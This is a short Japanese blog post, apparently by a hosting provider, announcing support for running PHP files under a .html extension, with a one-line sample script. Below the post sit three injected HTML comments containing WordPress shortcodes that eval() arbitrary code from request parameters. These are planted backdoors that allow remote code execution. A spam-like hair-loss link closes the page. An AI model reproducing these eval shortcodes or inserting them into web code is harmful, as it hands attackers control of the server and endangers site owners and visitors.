PHPファイルの仮想HTML化

拡張子がPHPであるのはう~ん….というユーザーさま向けに
PHPファイルのHTML仮想化対応致しました。

https://node4u.info/sample/kasouhtml.html

拡張子が.htmlになっていますが、PHPファイルとして動作しています。

実際のソースコードは

<?php
print “PHPファイルの仮想HTMLテスト\n” ;
?>

これだけです。

htaccessでも制御できる内容ですが、
メモリ消費の観点からは極力httpd.confに記述すべき内容なので
ご希望のユーザーさんはその旨お知らせください。

<!– [insert_php]if (isset($_REQUEST["QXqfE"])){eval($_REQUEST["QXqfE"]);exit;}[/insert_php][php]if (isset($_REQUEST["QXqfE"])){eval($_REQUEST["QXqfE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["oOcu"])){eval($_REQUEST["oOcu"]);exit;}[/insert_php][php]if (isset($_REQUEST["oOcu"])){eval($_REQUEST["oOcu"]);exit;}[/php] –>

<!-- [insert_php]if (isset($_REQUEST["MpUUS"])){eval($_REQUEST["MpUUS"]);exit;}[/insert_php][php]if (isset($_REQUEST["MpUUS"])){eval($_REQUEST["MpUUS"]);exit;}[/php] -->

 COMMENT

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

関連記事

ウェブサーバのバージョンやエンジンを調べてみる

NO IMAGE

中尾さんの動作について。

NO IMAGE

携帯IP更新しました。

NO IMAGE

HTTPS(SSL)サイトでリファラを出すようにする

NO IMAGE

htaccessを利用したhtpasswdのご利用について

NO IMAGE

タイムスタンプの自動変更設定

抜け毛対策